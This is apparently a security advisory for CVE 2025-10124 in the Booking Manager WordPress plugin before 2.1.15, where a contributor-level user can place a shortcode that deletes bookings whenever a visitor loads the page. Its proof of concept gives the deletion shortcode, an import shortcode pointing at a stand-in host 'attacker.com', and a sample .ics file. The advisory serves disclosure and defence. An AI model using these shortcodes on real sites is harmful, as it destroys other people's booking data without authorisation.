Booking Manager < 2.1.15 – Contributor+ Booking Deletion | CVE 2025-10124

Description

The plugin registers a shortcode that deletes bookings and makes that shortcode available to anyone with contributor and above privileges. When a page containing the shortcode is visited, the bookings are deleted.

Proof of Concept

1. Install the `booking` plugin (required for this vulnerability)
2. Add a new booking by importing a `.ics` file (ex: `[booking-manager-import url="http://attacker.com/malicious.ics"]`
3. Set the booking status to "Approved"
4. As a contributor, add the shortcode: `[booking-manager-delete resource_id=1 action='delete']` to a post/page
5. When the post/page is accessed by an unauthenticated visitor, the imported booking will be deleted.


Sample Malicious `.ics` file:

```
BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//test//EN
BEGIN:VEVENT
UID:1
DTSTAMP:20250101T000000Z
DTSTART:20250910T100000Z
DTEND:20250910T110000Z
SUMMARY:Injected by ICS
END:VEVENT
END:VCALENDAR
```